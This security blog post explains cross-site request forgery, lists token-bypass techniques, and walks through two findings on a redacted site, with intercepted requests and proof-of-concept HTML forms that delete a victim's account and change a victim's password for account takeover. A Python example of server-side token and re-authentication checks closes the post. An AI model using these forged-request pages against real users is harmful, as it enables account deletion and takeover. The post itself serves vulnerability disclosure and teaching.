Greetings everyone!
Today we are going to look at how to exploit a CSRF vulnerability. In this blog we will see how we were able to verify CSRF issues on redected.com that led to account deletion, user account takeover and changes to personal data. We will also see how different techniques work to bypass CSRF protection.
What is a CSRF vulnerability?
CSRF is one of the most commonly found vulnerabilities in websites. It tricks the victim into performing a malicious action on a web application in which the victim is already authenticated, using the victim's own session. The impact of the attack depends on the privileges the victim holds, because the attacker reuses the authentication the victim has already gained in the current session to perform the malicious action. CSRF exploits the assumption that, once a user is authenticated, every request coming from that user's browser must have been intended by the user. Such an attack can harm the user of the web application, for example through account takeover or abuse of the user account's privileges.
There are two parts to a Cross-Site Request Forgery (CSRF) attack that the attacker must supply:
- The first part tricks the victim into clicking a link or loading a page. This is done through social engineering.
- The second part is the "forged" (made-up) request sent from the victim's browser. The link sends a legitimate-looking request to the web application, which then performs an unwanted action without the victim's permission.
Examples of CSRF attacks (token bypass techniques):
- Changing the CSRF token
- Reusing the same CSRF token
- Removing the CSRF token
- Changing the method from POST to GET
- Replacing the token with a value of the same length
- Extracting the token via HTML injection
- Using only the static parts of the token
How to reproduce the CSRF attack:
Deleting a user's account via CSRF: here we exploit a CSRF vulnerability caused by the absence of a valid CSRF token on the account-deletion request, which lets an attacker easily delete a user's account.
Steps:
Visit https://redected.com and create two accounts for testing purposes: an attacker account and a victim account.
Now log in to the attacker account and navigate to https://redected.com/preferences, where you can delete your account.
Click on "Delete My Account" and intercept the request using Burp. The request looks like this:
POST /account/delete HTTP/1.1
Host: redected.com
Connection: close
Cookie: klksneo=eyJ1c2VyTmFtZSI6Im9mZmVuc2l2ZXRlc3RlcjAwMDBAZ21haWwuY29tIiwidXNlcklkIjoxNDcwNywidHJhY2VJZCI6IltvZmZlbnNpdmV0ZXN0ZXIwMDAwQGdtYWlsLmNvbV84MDdlYTY5My0xNDBhLTQ5ZGUtOTZhZi02OWEzZDI3MTE4OGFdIiwiZXhwaXJlIjoxNTk5MzM0NDU0LCJ2ZXJzaW9uIjoiMC45MC4wIn0=–sxU7lM2VZuhD86mwuonLBV3TXQLCyOgcL91xCNavzHA=
Upgrade-Insecure-Requests: 1
As we can see in the request above, there is no CSRF token that would mitigate this security risk.
Now simply create the CSRF exploitation page using the Burp engagement tool:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://redected.com/account/delete" method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Save it as CSRF.html.
In another browser, log in to the victim account and send this CSRF page to the victim. Whenever the victim clicks the URL, the victim's account is deleted and the victim loses the account.
CSRF leading to account takeover:
It is possible to take over any user's account via CSRF: the password-change request has no CSRF protection, and there is no validation of the current password when a user sets a new password. That means an attacker can perform a CSRF attack and change the victim's current password to one of the attacker's own choosing.
How to reproduce the CSRF attack:
Visit https://redected.com/ and create two accounts: an attacker account and a victim account.
Now log in to the attacker account and navigate to https://redected.com/preferences, where we can change our password without validating the current password.
Now change your password and intercept the request using Burp. The request looks like this:
POST /preferences HTTP/1.1
Host: redected.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: klssneo=eyJ1c2VyTmFtZSI6Im9mZmVuc2l2ZXRlc3RlcjAwMDBAZ21haWwuY29tIiwidXNlcklkIjoxNDcwNyLCJ2ZXJzaW9uIjoiMC45MC4wIn0=–iZjSrJ/ADBrFGDdQQFYgoSpuT3K03hvoWvWrASudB9Q=
Upgrade-Insecure-Requests: 1

title=DR&first_name=&last_name=&company_name=&locale=en-US&currency=USD&password=passwod&password_confirmation=password
As we can see, there is no CSRF token in the request.
Now create the CSRF PoC using the Burp engagement tool:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://redected.com/preferences" method="POST">
<input type="hidden" name="title" value="DR" />
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="last_name" value="" />
<input type="hidden" name="company_name" value="" />
<input type="hidden" name="locale" value="en-US" />
<input type="hidden" name="currency" value="USD" />
<input type="hidden" name="password" value="pasword@8133" />
<input type="hidden" name="password_confirmation" value="password @8133" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Save the above code as CSRF.html.
Now log in to the victim account in a second browser.
The attacker sends the victim a link to the page. When the logged-in victim clicks the link, the password is changed.
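Both findings above come down to two missing server-side controls: no CSRF token on the state-changing requests (/account/delete and /preferences), and no current-password check on the password change. The following Python example is added here and is not code from redected.com or from this post; the session and request structures, the secret, the fixed salt and the endpoint gate are assumptions for illustration. It also rejects the POST-to-GET switch and a stripped token from the bypass list above.

```python
import hashlib
import hmac
import secrets

# Constructed demo values; a real deployment loads these from configuration.
SERVER_SECRET = b"demo-secret-do-not-reuse"
SITE_ORIGIN = "https://redected.com"

def issue_csrf_token(session_id):
    """Synchronizer token: random nonce plus an HMAC binding it to this session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"

def token_is_valid(session_id, token):
    """Reject a missing, removed or forged token; compare in constant time."""
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)

def check_state_change(req, session):
    """Gate every state-changing endpoint such as /account/delete or /preferences."""
    if req["method"] != "POST":
        return False, "state changes must be POST"  # blocks the POST-to-GET trick
    origin = req["headers"].get("Origin") or req["headers"].get("Referer", "")
    if origin != SITE_ORIGIN and not origin.startswith(SITE_ORIGIN + "/"):
        return False, "cross-site origin"  # a forged form is posted from the attacker's page
    if not token_is_valid(session["id"], req["form"].get("csrf_token")):
        return False, "missing or invalid csrf token"
    return True, "ok"

def hash_password(password):
    # Fixed salt only to keep the demo deterministic; use a per-user salt in practice.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), b"demo-salt", 100_000).hex()

def change_password(req, session, stored_hash):
    """Password change needs the CSRF gate plus the current password (re-authentication)."""
    ok, why = check_state_change(req, session)
    if not ok:
        return False, why
    form = req["form"]
    if not hmac.compare_digest(hash_password(form.get("current_password", "")), stored_hash):
        return False, "current password incorrect"
    if form.get("password") != form.get("password_confirmation"):
        return False, "confirmation mismatch"
    return True, "password changed"
```

With these checks in place, the two PoC pages above are refused: the forged form carries the attacker's origin and no token, and even a request that somehow obtains a token cannot supply the victim's current password.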
Thanks for reading... See you in another blog!
Author
Pallab Jyoti Borah
VAPT Analyst